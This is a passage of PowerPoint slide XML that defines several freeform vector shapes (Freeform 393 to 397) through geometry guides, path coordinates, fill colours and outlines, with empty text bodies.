                  <a:gd name="T35" fmla="*/ 0 h 29"/>
                  <a:gd name="T36" fmla="*/ 19 w 22"/>
                  <a:gd name="T37" fmla="*/ 5 h 2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2"/>
                  <a:gd name="T58" fmla="*/ 0 h 29"/>
                  <a:gd name="T59" fmla="*/ 22 w 22"/>
                  <a:gd name="T60" fmla="*/ 29 h 29"/>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2" h="29">
                    <a:moveTo>
                      <a:pt x="19" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="20" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36260" name="Freeform 393"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3228" y="3367"/>
                <a:ext cx="22" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 22"/>
                  <a:gd name="T1" fmla="*/ 5 h 29"/>
                  <a:gd name="T2" fmla="*/ 20 w 22"/>
                  <a:gd name="T3" fmla="*/ 7 h 29"/>
                  <a:gd name="T4" fmla="*/ 19 w 22"/>
                  <a:gd name="T5" fmla="*/ 11 h 29"/>
                  <a:gd name="T6" fmla="*/ 21 w 22"/>
                  <a:gd name="T7" fmla="*/ 18 h 29"/>
                  <a:gd name="T8" fmla="*/ 22 w 22"/>
                  <a:gd name="T9" fmla="*/ 21 h 29"/>
                  <a:gd name="T10" fmla="*/ 21 w 22"/>
                  <a:gd name="T11" fmla="*/ 21 h 29"/>
                  <a:gd name="T12" fmla="*/ 18 w 22"/>
                  <a:gd name="T13" fmla="*/ 23 h 29"/>
                  <a:gd name="T14" fmla="*/ 18 w 22"/>
                  <a:gd name="T15" fmla="*/ 24 h 29"/>
                  <a:gd name="T16" fmla="*/ 17 w 22"/>
                  <a:gd name="T17" fmla="*/ 29 h 29"/>
                  <a:gd name="T18" fmla="*/ 13 w 22"/>
                  <a:gd name="T19" fmla="*/ 29 h 29"/>
                  <a:gd name="T20" fmla="*/ 8 w 22"/>
                  <a:gd name="T21" fmla="*/ 28 h 29"/>
                  <a:gd name="T22" fmla="*/ 5 w 22"/>
                  <a:gd name="T23" fmla="*/ 26 h 29"/>
                  <a:gd name="T24" fmla="*/ 3 w 22"/>
                  <a:gd name="T25" fmla="*/ 22 h 29"/>
                  <a:gd name="T26" fmla="*/ 0 w 22"/>
                  <a:gd name="T27" fmla="*/ 16 h 29"/>
                  <a:gd name="T28" fmla="*/ 0 w 22"/>
                  <a:gd name="T29" fmla="*/ 14 h 29"/>
                  <a:gd name="T30" fmla="*/ 2 w 22"/>
                  <a:gd name="T31" fmla="*/ 9 h 29"/>
                  <a:gd name="T32" fmla="*/ 7 w 22"/>
                  <a:gd name="T33" fmla="*/ 2 h 29"/>
                  <a:gd name="T34" fmla="*/ 9 w 22"/>
                  <a:gd name="T35" fmla="*/ 0 h 29"/>
                  <a:gd name="T36" fmla="*/ 19 w 22"/>
                  <a:gd name="T37" fmla="*/ 5 h 2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2"/>
                  <a:gd name="T58" fmla="*/ 0 h 29"/>
                  <a:gd name="T59" fmla="*/ 22 w 22"/>
                  <a:gd name="T60" fmla="*/ 29 h 29"/>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2" h="29">
                    <a:moveTo>
                      <a:pt x="19" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="20" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="5"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36261" name="Freeform 394"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3197" y="2983"/>
                <a:ext cx="32" cy="36"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 32"/>
                  <a:gd name="T1" fmla="*/ 36 h 36"/>
                  <a:gd name="T2" fmla="*/ 7 w 32"/>
                  <a:gd name="T3" fmla="*/ 26 h 36"/>
                  <a:gd name="T4" fmla="*/ 6 w 32"/>
                  <a:gd name="T5" fmla="*/ 22 h 36"/>
                  <a:gd name="T6" fmla="*/ 6 w 32"/>
                  <a:gd name="T7" fmla="*/ 17 h 36"/>
                  <a:gd name="T8" fmla="*/ 6 w 32"/>
                  <a:gd name="T9" fmla="*/ 14 h 36"/>
                  <a:gd name="T10" fmla="*/ 5 w 32"/>
                  <a:gd name="T11" fmla="*/ 12 h 36"/>
                  <a:gd name="T12" fmla="*/ 0 w 32"/>
                  <a:gd name="T13" fmla="*/ 4 h 36"/>
                  <a:gd name="T14" fmla="*/ 5 w 32"/>
                  <a:gd name="T15" fmla="*/ 5 h 36"/>
                  <a:gd name="T16" fmla="*/ 11 w 32"/>
                  <a:gd name="T17" fmla="*/ 7 h 36"/>
                  <a:gd name="T18" fmla="*/ 14 w 32"/>
                  <a:gd name="T19" fmla="*/ 6 h 36"/>
                  <a:gd name="T20" fmla="*/ 15 w 32"/>
                  <a:gd name="T21" fmla="*/ 5 h 36"/>
                  <a:gd name="T22" fmla="*/ 18 w 32"/>
                  <a:gd name="T23" fmla="*/ 1 h 36"/>
                  <a:gd name="T24" fmla="*/ 21 w 32"/>
                  <a:gd name="T25" fmla="*/ 0 h 36"/>
                  <a:gd name="T26" fmla="*/ 25 w 32"/>
                  <a:gd name="T27" fmla="*/ 0 h 36"/>
                  <a:gd name="T28" fmla="*/ 24 w 32"/>
                  <a:gd name="T29" fmla="*/ 7 h 36"/>
                  <a:gd name="T30" fmla="*/ 26 w 32"/>
                  <a:gd name="T31" fmla="*/ 8 h 36"/>
                  <a:gd name="T32" fmla="*/ 29 w 32"/>
                  <a:gd name="T33" fmla="*/ 9 h 36"/>
                  <a:gd name="T34" fmla="*/ 30 w 32"/>
                  <a:gd name="T35" fmla="*/ 10 h 36"/>
                  <a:gd name="T36" fmla="*/ 32 w 32"/>
                  <a:gd name="T37" fmla="*/ 11 h 36"/>
                  <a:gd name="T38" fmla="*/ 31 w 32"/>
                  <a:gd name="T39" fmla="*/ 13 h 36"/>
                  <a:gd name="T40" fmla="*/ 29 w 32"/>
                  <a:gd name="T41" fmla="*/ 15 h 36"/>
                  <a:gd name="T42" fmla="*/ 24 w 32"/>
                  <a:gd name="T43" fmla="*/ 21 h 36"/>
                  <a:gd name="T44" fmla="*/ 19 w 32"/>
                  <a:gd name="T45" fmla="*/ 30 h 36"/>
                  <a:gd name="T46" fmla="*/ 17 w 32"/>
                  <a:gd name="T47" fmla="*/ 33 h 36"/>
                  <a:gd name="T48" fmla="*/ 8 w 32"/>
                  <a:gd name="T49" fmla="*/ 36 h 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2"/>
                  <a:gd name="T76" fmla="*/ 0 h 36"/>
                  <a:gd name="T77" fmla="*/ 32 w 32"/>
                  <a:gd name="T78" fmla="*/ 36 h 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2" h="36">
                    <a:moveTo>
                      <a:pt x="8" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="36"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36262" name="Freeform 395"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3197" y="2983"/>
                <a:ext cx="32" cy="36"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 32"/>
                  <a:gd name="T1" fmla="*/ 36 h 36"/>
                  <a:gd name="T2" fmla="*/ 7 w 32"/>
                  <a:gd name="T3" fmla="*/ 26 h 36"/>
                  <a:gd name="T4" fmla="*/ 6 w 32"/>
                  <a:gd name="T5" fmla="*/ 22 h 36"/>
                  <a:gd name="T6" fmla="*/ 6 w 32"/>
                  <a:gd name="T7" fmla="*/ 17 h 36"/>
                  <a:gd name="T8" fmla="*/ 6 w 32"/>
                  <a:gd name="T9" fmla="*/ 14 h 36"/>
                  <a:gd name="T10" fmla="*/ 5 w 32"/>
                  <a:gd name="T11" fmla="*/ 12 h 36"/>
                  <a:gd name="T12" fmla="*/ 0 w 32"/>
                  <a:gd name="T13" fmla="*/ 4 h 36"/>
                  <a:gd name="T14" fmla="*/ 5 w 32"/>
                  <a:gd name="T15" fmla="*/ 5 h 36"/>
                  <a:gd name="T16" fmla="*/ 11 w 32"/>
                  <a:gd name="T17" fmla="*/ 7 h 36"/>
                  <a:gd name="T18" fmla="*/ 14 w 32"/>
                  <a:gd name="T19" fmla="*/ 6 h 36"/>
                  <a:gd name="T20" fmla="*/ 15 w 32"/>
                  <a:gd name="T21" fmla="*/ 5 h 36"/>
                  <a:gd name="T22" fmla="*/ 18 w 32"/>
                  <a:gd name="T23" fmla="*/ 1 h 36"/>
                  <a:gd name="T24" fmla="*/ 21 w 32"/>
                  <a:gd name="T25" fmla="*/ 0 h 36"/>
                  <a:gd name="T26" fmla="*/ 25 w 32"/>
                  <a:gd name="T27" fmla="*/ 0 h 36"/>
                  <a:gd name="T28" fmla="*/ 24 w 32"/>
                  <a:gd name="T29" fmla="*/ 7 h 36"/>
                  <a:gd name="T30" fmla="*/ 26 w 32"/>
                  <a:gd name="T31" fmla="*/ 8 h 36"/>
                  <a:gd name="T32" fmla="*/ 29 w 32"/>
                  <a:gd name="T33" fmla="*/ 9 h 36"/>
                  <a:gd name="T34" fmla="*/ 30 w 32"/>
                  <a:gd name="T35" fmla="*/ 10 h 36"/>
                  <a:gd name="T36" fmla="*/ 32 w 32"/>
                  <a:gd name="T37" fmla="*/ 11 h 36"/>
                  <a:gd name="T38" fmla="*/ 31 w 32"/>
                  <a:gd name="T39" fmla="*/ 13 h 36"/>
                  <a:gd name="T40" fmla="*/ 29 w 32"/>
                  <a:gd name="T41" fmla="*/ 15 h 36"/>
                  <a:gd name="T42" fmla="*/ 24 w 32"/>
                  <a:gd name="T43" fmla="*/ 21 h 36"/>
                  <a:gd name="T44" fmla="*/ 19 w 32"/>
                  <a:gd name="T45" fmla="*/ 30 h 36"/>
                  <a:gd name="T46" fmla="*/ 17 w 32"/>
                  <a:gd name="T47" fmla="*/ 33 h 36"/>
                  <a:gd name="T48" fmla="*/ 8 w 32"/>
                  <a:gd name="T49" fmla="*/ 36 h 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2"/>
                  <a:gd name="T76" fmla="*/ 0 h 36"/>
                  <a:gd name="T77" fmla="*/ 32 w 32"/>
                  <a:gd name="T78" fmla="*/ 36 h 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2" h="36">
                    <a:moveTo>
                      <a:pt x="8" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="36"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36263" name="Freeform 396"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3196" y="2962"/>
                <a:ext cx="33" cy="28"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 33"/>
                  <a:gd name="T1" fmla="*/ 25 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 23 h 28"/>
                  <a:gd name="T4" fmla="*/ 4 w 33"/>
                  <a:gd name="T5" fmla="*/ 13 h 28"/>
                  <a:gd name="T6" fmla="*/ 4 w 33"/>
                  <a:gd name="T7" fmla="*/ 10 h 28"/>
                  <a:gd name="T8" fmla="*/ 6 w 33"/>
                  <a:gd name="T9" fmla="*/ 8 h 28"/>
                  <a:gd name="T10" fmla="*/ 8 w 33"/>
                  <a:gd name="T11" fmla="*/ 7 h 28"/>
                  <a:gd name="T12" fmla="*/ 11 w 33"/>
                  <a:gd name="T13" fmla="*/ 4 h 28"/>
                  <a:gd name="T14" fmla="*/ 12 w 33"/>
                  <a:gd name="T15" fmla="*/ 5 h 28"/>
                  <a:gd name="T16" fmla="*/ 16 w 33"/>
                  <a:gd name="T17" fmla="*/ 6 h 28"/>
                  <a:gd name="T18" fmla="*/ 19 w 33"/>
                  <a:gd name="T19" fmla="*/ 6 h 28"/>
                  <a:gd name="T20" fmla="*/ 22 w 33"/>
                  <a:gd name="T21" fmla="*/ 3 h 28"/>
                  <a:gd name="T22" fmla="*/ 26 w 33"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 28 w 33"/>
                  <a:gd name="T25" fmla="*/ 0 h 28"/>
                  <a:gd name="T26" fmla="*/ 29 w 33"/>
                  <a:gd name="T27" fmla="*/ 5 h 28"/>
                  <a:gd name="T28" fmla="*/ 32 w 33"/>
                  <a:gd name="T29" fmla="*/ 12 h 28"/>
                  <a:gd name="T30" fmla="*/ 33 w 33"/>
                  <a:gd name="T31" fmla="*/ 15 h 28"/>
                  <a:gd name="T32" fmla="*/ 32 w 33"/>
                  <a:gd name="T33" fmla="*/ 18 h 28"/>
                  <a:gd name="T34" fmla="*/ 31 w 33"/>
                  <a:gd name="T35" fmla="*/ 20 h 28"/>
                  <a:gd name="T36" fmla="*/ 28 w 33"/>
                  <a:gd name="T37" fmla="*/ 21 h 28"/>
                  <a:gd name="T38" fmla="*/ 26 w 33"/>
                  <a:gd name="T39" fmla="*/ 21 h 28"/>
                  <a:gd name="T40" fmla="*/ 22 w 33"/>
                  <a:gd name="T41" fmla="*/ 21 h 28"/>
                  <a:gd name="T42" fmla="*/ 19 w 33"/>
                  <a:gd name="T43" fmla="*/ 22 h 28"/>
                  <a:gd name="T44" fmla="*/ 16 w 33"/>
                  <a:gd name="T45" fmla="*/ 26 h 28"/>
                  <a:gd name="T46" fmla="*/ 15 w 33"/>
                  <a:gd name="T47" fmla="*/ 27 h 28"/>
                  <a:gd name="T48" fmla="*/ 12 w 33"/>
                  <a:gd name="T49" fmla="*/ 28 h 28"/>
                  <a:gd name="T50" fmla="*/ 6 w 33"/>
                  <a:gd name="T51" fmla="*/ 26 h 28"/>
                  <a:gd name="T52" fmla="*/ 1 w 33"/>
                  <a:gd name="T53" fmla="*/ 25 h 28"/>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3"/>
                  <a:gd name="T82" fmla="*/ 0 h 28"/>
                  <a:gd name="T83" fmla="*/ 33 w 33"/>
                  <a:gd name="T84" fmla="*/ 28 h 28"/>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3" h="28">
                    <a:moveTo>
                      <a:pt x="1" y="25"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="25"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36264" name="Freeform 397"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3196" y="2962"/>
                <a:ext cx="33" cy="28"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 33"/>
                  <a:gd name="T1" fmla="*/ 25 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 23 h 28"/>
                  <a:gd name="T4" fmla="*/ 4 w 33"/>
                  <a:gd name="T5" fmla="*/ 13 h 28"/>
                  <a:gd name="T6" fmla="*/ 4 w 33"/>
                  <a:gd name="T7" fmla="*/ 10 h 28"/>
                  <a:gd name="T8" fmla="*/ 6 w 33"/>
                  <a:gd name="T9" fmla="*/ 8 h 28"/>
                  <a:gd name="T10" fmla="*/ 8 w 33"/>
                  <a:gd name="T11" fmla="*/ 7 h 28"/>
                  <a:gd name="T12" fmla="*/ 11 w 33"/>
                  <a:gd name="T13" fmla="*/ 4 h 28"/>
                  <a:gd name="T14" fmla="*/ 12 w 33"/>
                  <a:gd name="T15" fmla="*/ 5 h 28"/>
                  <a:gd name="T16" fmla="*/ 16 w 33"/>
                  <a:gd name="T17" fmla="*/ 6 h 28"/>
                  <a:gd name="T18" fmla="*/ 19 w 33"/>
                  <a:gd name="T19" fmla="*/ 6 h 28"/>
                  <a:gd name="T20" fmla="*/ 22 w 33"/>
                  <a:gd name="T21" fmla="*/ 3 h 28"/>
                  <a:gd name="T22" fmla="*/ 26 w 33"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 28 w 33"/>
                  <a:gd name="T25" fmla="*/ 0 h 28"/>
                  <a:gd name="T26" fmla="*/ 29 w 33"/>
                  <a:gd name="T27" fmla="*/ 5 h 28"/>
                  <a:gd name="T28" fmla="*/ 32 w 33"/>
                  <a:gd name="T29" fmla="*/ 12 h 28"/>
                  <a:gd name="T30" fmla="*/ 33 w 33"/>
                  <a:gd name="T31" fmla="*/ 15 h 28"/>
                  <a:gd name="T32" fmla="*/ 32 w 33"/>
                  <a:gd name="T33" fmla="*/ 18 h 28"/>
                  <a:gd name="T34" fmla="*/ 31 w 33"/>
                  <a:gd name="T35" fmla="*/ 20 h 28"/>
                  <a:gd name="T36" fmla="*/ 28 w 33"/>
                  <a:gd name="T37" fmla="*/ 21 h 28"/>
                  <a:gd name="T38" fmla="*/ 26 w 33"/>
                  <a:gd name="T39" fmla="*/ 21 h 28"/>
                  <a:gd name="T40" fmla="*/ 22 w 33"/>
                  <a:gd name="T41" fmla="*/ 21 h 28"/>
                  <a:gd name="T42" fmla="*/ 19 w 33"/>
                  <a:gd name="T43" fmla="*/ 22 h 28"/>
                  <a:gd name="T44" fmla="*/ 16 w 33"/>
                  <a:gd name="T45" fmla="*/ 26 h 28"/>
                  <a:gd name="T46" fmla="*/ 15 w 33"/>
                  <a:gd name="T47" fmla="*/ 27 h 28"/>
                  <a:gd name="T48" fmla="*/ 12 w 33"/>
                  <a:gd name="T49" fmla="*/ 28 h 28"/>
                  <a:gd name="T50" fmla="*/ 6 w 33"/>
                  <a:gd name="T51" fmla="*/ 26 h 28"/>
                  <a:gd name="T52" fmla="*/ 1 w 33"/>
                  <a:gd name="T53" fmla="*/ 25 h 28"/>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3"/>
                  <a:gd name="T82" fmla="*/ 0 h 28"/>
                  <a:gd name="T83" fmla="*/ 33 w 33"/>
                  <a:gd name="T84" fmla="*/ 28 h 28"/>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3" h="28">
                    <a:moveTo>
                      <a:pt x="1" y="25"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="6"/>
